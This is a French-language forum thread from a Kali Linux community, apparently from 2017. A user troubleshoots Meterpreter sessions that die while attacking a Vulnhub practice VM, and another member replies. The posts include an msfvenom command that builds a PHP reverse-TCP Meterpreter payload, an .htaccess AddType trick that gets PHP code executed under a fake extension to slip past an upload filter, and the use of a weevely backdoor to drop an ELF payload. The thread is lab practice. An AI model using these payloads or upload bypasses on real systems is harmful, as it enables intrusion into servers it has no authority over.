Auteur Sujet: Meterpreter session (i) closed. Reason: Died  (Lu 2838 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Kurdy34

  • Membre Junior
  • *
  • Messages: 31
  • +0/-0
Meterpreter session (i) closed. Reason: Died
« le: 07 septembre 2017 à 22:40:18 »
Salut à tous!

J'essaie de vaincre une VM de vulnhub (from sqli to Shell)
J'y ai appris pas mal de chose mais je suis bloqué sur la partie meterpreter.

J'ai créé un payload de type php/meterpreter/reverse_tcp
msfvenom -p php/meterpreter/reverse_tcp LHOST= 192.168.1.71 LPORT= 4444 -o pouet.lol
J'ai upload le fichier sur la cible après avoir également upload un .htaccess
Addtype application/x-httpd-php .lol
Puis j'accède au fichier pouet.lol

Ma session meterpreter indique alors
sending stage (37514 bytes) to 192.168.1.63
192.168.1.63 - Meterpreter session 1 closed. Reason: Died
Meterpreter session 1 opened (127.0.0.1 -> 192.168.1.63:45986) at (...)
Negotiating tlv encryption
Pour moi c'est un peu contradictoire, la session meurt avant d'ouvrir? Quand je tape "sessions" je n'ai aucune session d'active...

Je ne comprend pas ce qui foire...

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3794
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #1 le: 08 septembre 2017 à 07:06:44 »
En .php ça fonctionne ?

Hors ligne Kurdy34

  • Membre Junior
  • *
  • Messages: 31
  • +0/-0
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #2 le: 08 septembre 2017 à 09:12:13 »
Je ne sais pas je ne peux pas uploader en .php sur cette VM. Et vu que je ne l'ai pas encore rootée je n'ai y ai pas accès pour le tester directement  :-X

Hors ligne Kurdy34

  • Membre Junior
  • *
  • Messages: 31
  • +0/-0
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #3 le: 20 septembre 2017 à 23:21:43 »
J’ai finalement testé sur ma VM kali. Ça fonctionne en local pas de « session died »...
Cela signifie qu’il y aura des protections sur ma cible?

Hors ligne Kurdy34

  • Membre Junior
  • *
  • Messages: 31
  • +0/-0
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #4 le: 03 octobre 2017 à 10:27:41 »
Hello,

J’ai fini par trouver une solution.
J’ai utilisé weevely qui m’a permis d’uploader et d’executer le même payload en format .elf

La session meterpreter s’ouvre alors correctement.
Par contre impossible d’ouvrir un (une?) shell, l’operation se soldant par un message d’erreur « core_channel_write: Operation failed : 9 »

Impossible également de migrer de process...

Je ne sais pas s’il faut que j’en cree un nouveau Topic sur le sujet?

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3794
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #5 le: 03 octobre 2017 à 19:05:15 »
wevely permet de créer un backdoor php mais pas un payload meterpreter, c'est étrange ta réponse.

Hors ligne Kurdy34

  • Membre Junior
  • *
  • Messages: 31
  • +0/-0
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #6 le: 03 octobre 2017 à 22:29:12 »
Non c’est juste que j’ai sauté une étape.
J’ai bien uploadé le backdoor php généré par weevely.
Une fois connecté à ce dernier j’ai uploadé sur ma machine cible un payload meterpreter cette fois sous le format .elf et non .php ou autre format inventé.

Hors ligne coyotus

  • Contributeur de Kali-linux.fr
  • Membre Elite
  • *****
  • Messages: 3794
  • +264/-30
  • IN GNU WE TRUST
    • Groupe d'Utilisateurs de GNU/Linux...
Re : Meterpreter session (i) closed. Reason: Died
« Réponse #7 le: 04 octobre 2017 à 06:47:57 »
ok, j’avais pas tout compris.